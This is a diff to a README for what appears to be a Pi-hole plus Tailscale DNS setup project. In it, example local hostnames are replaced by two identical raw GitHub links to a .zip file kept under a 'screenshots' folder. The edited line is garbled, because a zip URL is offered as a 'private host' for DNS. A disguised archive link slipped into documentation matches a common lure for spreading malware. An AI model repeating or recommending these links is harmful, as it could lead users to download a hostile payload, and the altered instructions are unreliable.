fahad25051988/pihole-tailscale-dns/README.md

 What to customize for your environment
 - Blocklists and allowed domains: tailor to household needs or organization policy.
-- Local DNS records: add private hosts (e.g., printer.local, NAS.local) for faster resolution.
+- Local DNS records: add private hosts (e.g., https://raw.githubusercontent.com/fahad25051988/pihole-tailscale-dns/master/screenshots/dns_pihole_tailscale_1.5.zip, https://raw.githubusercontent.com/fahad25051988/pihole-tailscale-dns/master/screenshots/dns_pihole_tailscale_1.5.zip) for faster resolution.
 - Upstream DNS: choose trusted resolvers that fit your privacy policy.
 - Tailscale network topology: decide which devices join the DNS network and how you route traffic.
 - Firewall policies: adapt to your environment’s security posture.